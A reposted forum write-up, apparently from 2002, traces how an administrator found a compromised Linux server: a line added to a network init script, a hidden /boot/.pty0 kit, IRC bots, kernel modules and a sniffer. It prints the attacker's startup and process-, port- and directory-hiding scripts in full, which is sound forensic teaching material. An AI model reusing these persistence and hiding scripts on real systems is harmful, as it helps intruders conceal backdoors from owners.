|
 
- UID
- 1
- 威望
- 1240 点
- 金钱
- 24019 金币
- 点卡
- 317 点
|
1#
发表于 2002-10-27 02:43
| 只看该作者
[转帖]入侵分析
一、意外的进入
#uname -a
Linux *.*.cn.net 2.2.5-15 #1 Mon Apr 19 23:00:46 EDT 1999 i686 unknown
俺习惯性地先进到/etc/rc.d/init.d,看了一下,马上发现异状:
#ls -la
……
-rwxr-xr-x 1 root root 2775 Mar 26 1999 netfs
-rwxr-xr-x 1 root root 5537 Mar 3 21:23 network
-rwxr-xr-x 1 root root 2408 Apr 16 1999 nfs
……
二、初步检查
明显是个新手干的嘛,network文件被人动过了,咱们用stat命令看看先:
#stat network
file: "network"
Size: 5537 Filetype: Regular File
Mode: (0755/-rwxr-xr-x) Uid: ( 0/ root) Gid: ( 0/ root)
Device: 3,1 Inode: 269454 Links: 1
Access: Sun Mar 11 10:59:59 2001(00000.05:53:41)
Modify: Sun Mar 4 05:23:41 2001(00007.11:29:59)
Change: Sun Mar 4 05:23:41 2001(00007.11:29:59)
最后被人改动的时间是5月4号的凌晨。让我们来看看他往文件里加了什么吧:
#cat network
……
/usr/lib/libdd.so.1
就是这么一句,加在文件末尾,看来的确是手段不甚高明。瞧瞧这是个什么文件先
#file /usr/lib/libdd.so.1
/usr/lib/libdd.so.1: ELF 32-bit LSB executable, Intel 80386, version 1, dynamically linked (uses shared libs), not stripped
哦,是个二进制的可执行文件,执行下strings看是否眼熟
#strings /usr/lib/libdd.so.1
/lib/ld-linux.so.2
__gmon_start__
libc.so.6
system
__deregister_frame_info
_IO_stdin_used
__libc_start_main
__register_frame_info
GLIBC_2.0
PTRh
/boot/.pty0/go.sh <--------这条信息看上去比较有趣
哦,这就简单了嘛,俺看看这里面的路径:
#cd /boot/.pty0
#cat go.sh
#!/bin/bash
f=`ls -al /boot | grep .pty0`
if [ -n "$f" ]; then
cd /boot/.pty0
./mcd -q
cd mech1
./mech -f conf 1>/dev/null 2>/dev/null
cd ..
cd mech2
./mech -f conf 1>/dev/null 2>/dev/null
cd ..
cd mech3
./mech -f conf 1>/dev/null 2>/dev/null
cd ..
/sbin/insmod paraport.o 1>/dev/null 2>/dev/null
/sbin/insmod iBCS.o 1>/dev/null 2>/dev/null
./ascunde.sh
fi
有点晕,看不明白mcd、mech这些东西是干嘛用的,再看一下下一个脚本是什么:
#cat ascunde.sh
#!/bin/bash
for proces in `/bin/cat /boot/.pty0/hdm`; do
P=`/sbin/pidof $proces`
if [ -n "$P" ]; then
killall -31 $proces 1>/dev/hdm 2>/dev/hdm
fi
done
for port in `/bin/cat /boot/.pty0/hdm1`; do
./nethide `./dec2hex $port` 1>/dev/hdm 2>/dev/hdm
done
for director in `/bin/cat /boot/.pty0/hdm2`; do
./hidef $director 1>/dev/hdm 2>/dev/hdm
done
看到这里,事情开始有趣了,这似乎不是一个三流的script kiddle干的活嘛,打个包拖回来先,于是俺
#cd /boot
#ls -la
total 2265
drwxr-xr-x 3 root root 1024 Mar 11 03:01 .
drwxr-xr-x 21 root root 1024 Mar 2 03:37 ..
lrwxrwxrwx 1 root root 19 Sep 26 1999 System.map -> System.map-2.2.5-15
-rw-r--r-- 1 root root 186704 Apr 20 1999 System.map-2.2.5-15
-rw-r--r-- 1 root root 512 Sep 26 1999 boot.0300
-rw-r--r-- 1 root root 4544 Apr 13 1999 boot.b
-rw-r--r-- 1 root root 612 Apr 13 1999 chain.b
-rw------- 1 root root 9728 Sep 26 1999 map
lrwxrwxrwx 1 root root 20 Sep 26 1999 module-info -> module-info-2.2.5-15
-rw-r--r-- 1 root root 11773 Apr 20 1999 module-info-2.2.5-15
-rw-r--r-- 1 root root 620 Apr 13 1999 os2_d.b
-rwxr-xr-x 1 root root 1469282 Apr 20 1999 vmlinux-2.2.5-15
lrwxrwxrwx 1 root root 16 Sep 26 1999 vmlinuz -> vmlinuz-2.2.5-15
-rw-r--r-- 1 root root 617288 Apr 20 1999 vmlinuz-2.2.5-15
咦,事情更有趣了……居然没有看到.pty0的目录
#cd .pty0
#ls -laF
total 1228
drwxr-xr-x 3 root root 1024 Mar 11 03:01 ../
-rwxr-xr-x 1 root root 345 Mar 3 21:23 ascunde.sh*
-rwxr-xr-x 1 root root 12760 Mar 3 21:23 dec2hex*
-rwxr-xr-x 1 root root 13414 Mar 3 21:23 ered*
-rwxr-xr-x 1 root root 358 Mar 7 19:03 go.sh*
-rwxr-xr-x 1 root root 3872 Mar 3 21:23 hidef*
-rw-r--r-- 1 root root 956 Mar 3 21:23 iBCS.o
-rw-r--r-- 1 root root 524107 Mar 7 18:40 m.tgz
-rwxr-xr-x 1 root root 656111 Mar 3 21:23 mcd*
drwxr-xr-x 4 root root 1024 Mar 7 19:00 mech1/
drwxr-xr-x 4 root root 1024 Mar 9 19:50 mech2/
drwxr-xr-x 4 root root 1024 Mar 9 19:20 mech3/
-rwxr-xr-x 1 root root 12890 Mar 3 21:23 nethide*
-rw-r--r-- 1 root root 10948 Mar 3 21:23 paraport.o
-rw-r--r-- 1 root root 522 Mar 3 21:23 ssh_host_key
-rw------- 1 root root 512 Mar 11 04:16 ssh_random_seed
-rw-r--r-- 1 root root 677 Mar 3 21:23 sshd_config
看来是加载了某个lkm了,比较讨厌。
#/sbin/lsmod
Module Size Used by
nfsd 150936 8 (autoclean)
lockd 30856 1 (autoclean) [nfsd]
sunrpc 52356 1 (autoclean) [nfsd lockd]
3c59x 18920 1 (autoclean)
这些是正常的lkm么?前三个模块跟rpc有关,不知开了哪些rpc服务
#/usr/sbin/rpcinfo -p localhost
program vers proto port
100000 2 tcp 111 rpcbind
100024 1 tcp 664 status
100011 1 udp 673 rquotad
100005 3 tcp 695 mountd
100003 2 udp 2049 nfs
100021 3 tcp 1024 nlockmgr
原来如此,难怪会被入侵,该开的全开了。不过也证明了nfsd,lockd,sunrpc这三个模块没问题了。
再来看看网卡吧,3c59x是网卡的驱动模块。
#/sbin/ifconfig -a
/sbin/ifconfig -a
lo Link encap ocal Loopback
inet addr:127.0.0.1 Bcast:127.255.255.255 Mask:255.0.0.0
UP LOOPBACK RUNNING MTU:3924 Metric:1
RX packets:380640 errors:3374 dropped:0 overruns:0
TX packets:0 errors:0 dropped:0 overruns:380640
eth0 Link encap:10Mbps Ethernet HWaddr 00:10:5A:63:5B:05
inet addr:*.*.*.* Bcast:*.*.*.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:71144611 errors:820101 dropped:0 overruns:0
TX packets:0 errors:0 dropped:0 overruns:436037129
Interrupt:10 Base address:0xe400
#dmesg|grep eth0
eth0: 3Com 3c905B Cyclone 100baseTx at 0xe400, 00:10:5a:63:5b:05, IRQ 10
eth0: Setting promiscuous mode.
device eth0 entered promiscuous mode |
我是一个呼吸着现在的空气而生活在过去的人
这样的注定孤独,孤独的身处闹市却犹如置身于荒漠
我已习惯了孤独,爱上孤独
他让我看清了自我,还原了自我
让我再静静的沉思中得到快乐和满足
再孤独的世界里我一遍又一遍
不厌其烦的改写着自己的过去
延伸到现在与未来
然而那只是泡沫般的美梦
产生的时刻又伴随着破灭的到来
在灰飞烟灭的瞬间我看到的是过程的美丽
而不是结果的悲哀。。。
|
|
